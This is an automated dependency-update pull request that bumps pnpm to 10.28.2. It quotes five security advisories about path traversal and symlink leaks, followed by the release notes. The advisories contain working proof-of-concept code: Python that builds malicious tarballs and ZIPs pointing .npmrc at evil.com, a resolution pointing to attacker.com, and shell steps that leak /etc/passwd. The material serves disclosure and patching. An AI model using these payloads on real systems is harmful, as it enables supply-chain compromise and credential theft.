chore(deps): update pnpm to v10.28.2 [SECURITY]

[bfra-me]

This PR contains the following updates:

Package	Type	Update	Change	OpenSSF
pnpm (source)	packageManager	patch	10.28.0 → 10.28.2

---

pnpm has Windows-specific tarball Path Traversal

CVE-2026-23889 / GHSA-6x96-7vc8-cm3p

More information

Details

Summary

A path traversal vulnerability in pnpm's tarball extraction allows malicious packages to write files outside the package directory on Windows. The path normalization only checks for ./ but not .\. On Windows, backslashes are directory separators, enabling path traversal.

This vulnerability is Windows-only.

Details

1. Incomplete Path Normalization (store/cafs/src/parseTarball.ts:107-110)

if (fileName.includes('./')) {
  fileName = path.posix.join('/', fileName).slice(1)
}

A path like foo\..\..\.npmrc does NOT contain ./ and bypasses this check.

2. Platform-Dependent Behavior (fs/indexed-pkg-importer/src/importIndexedDir.ts:97-98)

• On Unix: Backslashes are literal filename characters (safe)
• On Windows: Backslashes are directory separators (exploitable)

PoC

1. Create a malicious tarball with entry package/foo\..\..\.npmrc
2. Host it or use as a tarball URL dependency
3. On Windows: pnpm install
4. Observe .npmrc written outside package directory

import tarfile, io

tar_buffer = io.BytesIO()
with tarfile.open(fileobj=tar_buffer, mode='w:gz') as tar:
    pkg_json = b'{"name": "malicious-pkg", "version": "1.0.0"}'
    pkg_info = tarfile.TarInfo(name='package/package.json')
    pkg_info.size = len(pkg_json)
    tar.addfile(pkg_info, io.BytesIO(pkg_json))

    malicious_content = b'registry=https://evil.com/\n'
    mal_info = tarfile.TarInfo(name='package/foo\\..\\..\\.npmrc')
    mal_info.size = len(malicious_content)
    tar.addfile(mal_info, io.BytesIO(malicious_content))

with open('malicious-pkg-1.0.0.tgz', 'wb') as f:
    f.write(tar_buffer.getvalue())

Impact

• Windows pnpm users
• Windows CI/CD pipelines (GitHub Actions Windows runners, Azure DevOps)
• Can overwrite .npmrc, build configs, or other files

Verified on pnpm main @​ commit 5a0ed1d45.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

References

• https://github.com/pnpm/pnpm/security/advisories/GHSA-6x96-7vc8-cm3p
• https://github.com/pnpm/pnpm/commit/6ca07ffbe6fc0e8b8cdc968f228903ba0886f7c0
• https://github.com/pnpm/pnpm
• https://github.com/pnpm/pnpm/releases/tag/v10.28.1

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

pnpm: Binary ZIP extraction allows arbitrary file write via path traversal (Zip Slip)

CVE-2026-23888 / GHSA-6pfh-p556-v868

More information

Details

Summary

A path traversal vulnerability in pnpm's binary fetcher allows malicious packages to write files outside the intended extraction directory. The vulnerability has two attack vectors: (1) Malicious ZIP entries containing ../ or absolute paths that escape the extraction root via AdmZip's extractAllTo, and (2) The BinaryResolution.prefix field is concatenated into the extraction path without validation, allowing a crafted prefix like ../../evil to redirect extracted files outside targetDir.

Details

The vulnerability exists in the binary fetching and extraction logic:

1. Unvalidated ZIP Entry Extraction (fetching/binary-fetcher/src/index.ts)

AdmZip's extractAllTo does not validate entry paths for path traversal:

const zip = new AdmZip(buffer)
const nodeDir = basename === '' ? targetDir : path.dirname(targetDir)
const extractedDir = path.join(nodeDir, basename)
zip.extractAllTo(nodeDir, true)  // Entry paths not validated!
await renameOverwrite(extractedDir, targetDir)

A ZIP entry with path ../../../.npmrc will be written outside nodeDir.

2. Unvalidated Prefix in BinaryResolution (resolving/resolver-base/src/index.ts)

The basename variable comes from BinaryResolution.prefix and is used directly in path construction:

const extractedDir = path.join(nodeDir, basename)
// If basename is '../../evil', this points outside nodeDir

PoC

Attack Vector 1: ZIP Entry Path Traversal

import zipfile
import io

zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w') as zf:
    # Normal file
    zf.writestr('node-v20.0.0-linux-x64/bin/node', b'#!/bin/sh\necho "legit node"')
    # Malicious path traversal entry
    zf.writestr('../../../.npmrc', b'registry=https://evil.com/\n')

with open('malicious-node.zip', 'wb') as f:
    f.write(zip_buffer.getvalue())

Attack Vector 2: Prefix Traversal via malicious resolution:

{
  "resolution": {
    "type": "binary",
    "url": "https://attacker.com/node.zip",
    "prefix": "../../PWNED"
  }
}

Impact

• All pnpm users who install packages with binary assets
• Users who configure custom Node.js binary locations
• CI/CD pipelines that auto-install binary dependencies
• Can overwrite config files, scripts, or other sensitive files leading to RCE

Verified on pnpm main @​ commit 5a0ed1d45.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

References

• https://github.com/pnpm/pnpm/security/advisories/GHSA-6pfh-p556-v868
• https://nvd.nist.gov/vuln/detail/CVE-2026-23888
• https://github.com/pnpm/pnpm/commit/5c382f0ca3b7cc49963b94677426e66539dcb3f5
• https://github.com/pnpm/pnpm
• https://github.com/pnpm/pnpm/releases/tag/v10.28.1

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

pnpm scoped bin name Path Traversal allows arbitrary file creation outside node_modules/.bin

CVE-2026-23890 / GHSA-xpqm-wm3m-f34h

More information

Details

Summary

A path traversal vulnerability in pnpm's bin linking allows malicious npm packages to create executable shims or symlinks outside of node_modules/.bin. Bin names starting with @ bypass validation, and after scope normalization, path traversal sequences like ../../ remain intact.

Details

The vulnerability exists in the bin name validation and normalization logic:

1. Validation Bypass (pkg-manager/package-bins/src/index.ts)

The filter allows any bin name starting with @ to pass through without validation:

.filter((commandName) =>
  encodeURIComponent(commandName) === commandName ||
  commandName === '' ||
  commandName[0] === '@&#8203;'  // <-- Bypasses validation
)

2. Incomplete Normalization (pkg-manager/package-bins/src/index.ts)

function normalizeBinName (name: string): string {
  return name[0] === '@​' ? name.slice(name.indexOf('/') + 1) : name
}
// Input:  @​scope/../../evil
// Output: ../../evil  <-- Path traversal preserved!

3. Exploitation (pkg-manager/link-bins/src/index.ts:288)

The normalized name is used directly in path.join() without validation.

PoC

1. Create a malicious package:

{
  "name": "malicious-pkg",
  "version": "1.0.0",
  "bin": {
    "@​scope/../../.npmrc": "./malicious.js"
  }
}

2. Install the package:

pnpm add /path/to/malicious-pkg

3. Observe .npmrc created in project root (outside node_modules/.bin).

Impact

• All pnpm users who install npm packages
• CI/CD pipelines using pnpm
• Can overwrite config files, scripts, or other sensitive files

Verified on pnpm main @​ commit 5a0ed1d45.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

References

• https://github.com/pnpm/pnpm/security/advisories/GHSA-xpqm-wm3m-f34h
• https://github.com/pnpm/pnpm/commit/8afbb1598445d37985d91fda18abb4795ae5062d
• https://github.com/pnpm/pnpm
• https://github.com/pnpm/pnpm/releases/tag/v10.28.1

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

pnpm has symlink traversal in file:/git dependencies

CVE-2026-24056 / GHSA-m733-5w8f-5ggw

More information

Details

Summary

When pnpm installs a file: (directory) or git: dependency, it follows symlinks and reads their target contents without constraining them to the package root. A malicious package containing a symlink to an absolute path (e.g., /etc/passwd, ~/.ssh/id_rsa) causes pnpm to copy that file's contents into node_modules, leaking local data.

Preconditions: Only affects file: and git: dependencies. Registry packages (npm) have symlinks stripped during publish and are NOT affected.

Details

The vulnerability exists in store/cafs/src/addFilesFromDir.ts. The code uses fs.statSync() and readFileSync() which follow symlinks by default:

const absolutePath = path.join(dirname, relativePath)
const stat = fs.statSync(absolutePath)  // Follows symlinks!
const buffer = fs.readFileSync(absolutePath)  // Reads symlink TARGET

There is no check that absolutePath resolves to a location inside the package directory.

PoC

##### Create malicious package
mkdir -p /tmp/evil && cd /tmp/evil
ln -s /etc/passwd leaked-passwd.txt
echo '{"name":"evil","version":"1.0.0","files":["*.txt"]}' > package.json

##### Victim installs
mkdir /tmp/victim && cd /tmp/victim
pnpm init && pnpm add file:../evil

##### Leaked!
cat node_modules/evil/leaked-passwd.txt

Impact

• Developers installing local/file dependencies
• CI/CD pipelines installing git dependencies
• Credential theft via symlinks to ~/.aws/credentials, ~/.npmrc, ~/.ssh/id_rsa

Suggested Fix

Use lstatSync to detect symlinks and reject those pointing outside the package root in store/cafs/src/addFilesFromDir.ts.

Severity

• CVSS Score: 6.7 / 10 (Medium)
• Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/pnpm/pnpm/security/advisories/GHSA-m733-5w8f-5ggw
• https://github.com/pnpm/pnpm/commit/b277b45bc35ae77ca72d7634d144bbd58a48b70f
• https://github.com/pnpm/pnpm
• https://github.com/pnpm/pnpm/releases/tag/v10.28.2

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

pnpm has Path Traversal via arbitrary file permission modification

CVE-2026-24131 / GHSA-v253-rj99-jwpq

More information

Details

Summary

When pnpm processes a package's directories.bin field, it uses path.join() without validating the result stays within the package root. A malicious npm package can specify "directories": {"bin": "../../../../tmp"} to escape the package directory, causing pnpm to chmod 755 files at arbitrary locations.

Note: Only affects Unix/Linux/macOS. Windows is not affected (fixBin gated by EXECUTABLE_SHEBANG_SUPPORTED).

Details

Vulnerable code in pkg-manager/package-bins/src/index.ts:15-21:

if (manifest.directories?.bin) {
  const binDir = path.join(pkgPath, manifest.directories.bin)  // NO VALIDATION
  const files = await findFiles(binDir)
  // ... files outside package returned, then chmod 755'd
}

The bin field IS protected with isSubdir() at line 53, but directories.bin lacks this check.

PoC

##### Create malicious package
mkdir /tmp/malicious-pkg
echo '{"name":"malicious","version":"1.0.0","directories":{"bin":"../../../../tmp/target"}}' > /tmp/malicious-pkg/package.json

##### Create sensitive file
mkdir -p /tmp/target
echo "secret" > /tmp/target/secret.sh
chmod 600 /tmp/target/secret.sh  # Private

##### Install
pnpm add file:/tmp/malicious-pkg

##### Check permissions
ls -la /tmp/target/secret.sh  # Now 755 (world-readable)

Impact

• Supply-chain attack via npm packages
• File permissions changed from 600 to 755 (world-readable)
• Affects non-dotfiles in predictable paths (dotfiles excluded by tinyglobby default)

Suggested Fix

Add isSubdir validation for directories.bin paths in pkg-manager/package-bins/src/index.ts, matching the existing validation in commandsFromBin():

if (manifest.directories?.bin) {
  const binDir = path.join(pkgPath, manifest.directories.bin)
  if (!isSubdir(pkgPath, binDir)) {
    return []  // Reject paths outside package
  }
  // ...
}

Severity

• CVSS Score: 6.7 / 10 (Medium)
• Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/pnpm/pnpm/security/advisories/GHSA-v253-rj99-jwpq
• https://github.com/pnpm/pnpm/commit/17432ad5bbed5c2e77255ca6d56a1449bbcfd943
• https://github.com/pnpm/pnpm
• https://github.com/pnpm/pnpm/releases/tag/v10.28.2

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

pnpm/pnpm (pnpm)

v10.28.2: pnpm 10.28.2

Compare Source

Patch Changes

• Security fix: prevent path traversal in directories.bin field.

• When pnpm installs a file: or git: dependency, it now validates that symlinks point within the package directory. Symlinks to paths outside the package root are skipped to prevent local data from being leaked into node_modules.

  This fixes a security issue where a malicious package could create symlinks to sensitive files (e.g., /etc/passwd, ~/.ssh/id_rsa) and have their contents copied when the package is installed.

  Note: This only affects file: and git: dependencies. Registry packages (npm) have symlinks stripped during publish and are not affected.

• Fixed optional dependencies to request full metadata from the registry to get the libc field, which is required for proper platform compatibility checks #​9950.

Platinum Sponsors

Gold Sponsors

v10.28.1: pnpm 10.28.1

Compare Source

Patch Changes

• Fixed installation of config dependencies from private registries.

  Added support for object type in configDependencies when the tarball URL returned from package metadata differs from the computed URL #​10431.

• Fix path traversal vulnerability in binary fetcher ZIP extraction

  • Validate ZIP entry paths before extraction to prevent writing files outside target directory
  • Validate BinaryResolution.prefix (basename) to prevent directory escape via crafted prefix
  • Both attack vectors now throw ERR_PNPM_PATH_TRAVERSAL error

• Support plain http:// and https:// URLs ending with .git as git repository dependencies.

  Previously, URLs like https://gitea.example.org/user/repo.git#commit were not recognized as git repositories because they lacked the git+ prefix (e.g., git+https://). This caused issues when installing dependencies from self-hosted git servers like Gitea or Forgejo that don't provide tarball downloads.

  Changes:

  • The git resolver now runs before the tarball resolver, ensuring git URLs are handled by the correct resolver
  • The git resolver now recognizes plain http:// and https:// URLs ending in .git as git repositories
  • Removed the isRepository check from the tarball resolver since it's no longer needed with the new resolver order

  Fixes #​10468

• pnpm run -r and pnpm run --filter now fail with a non-zero exit code when no packages have the specified script. Previously, this only failed when all packages were selected. Use --if-present to suppress this error #​6844.

• Fixed a path traversal vulnerability in tarball extraction on Windows. The path normalization was only checking for ./ but not .\. Since backslashes are directory separators on Windows, malicious packages could use paths like foo\..\..\.npmrc to write files outside the package directory.

• When running "pnpm exec" from a subdirectory of a project, don't change the current working directory to the root of the project #​5759.

• Fixed a path traversal vulnerability in pnpm's bin linking. Bin names starting with @ bypassed validation, and after scope normalization, path traversal sequences like ../../ remained intact.

• Revert Try to avoid making network calls with preferOffline #​10334.

• Fix --save-peer to write valid semver ranges to peerDependencies for protocol-based installs (e.g. jsr:) by deriving from resolved versions when available and falling back to * if none is available #​10417.

• Do not exclude the root workspace project, when it is explicitly selected via a filter #​10465.

Platinum Sponsors

Gold Sponsors

---

Configuration

📅 Schedule: Branch creation - "" in timezone America/Phoenix, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.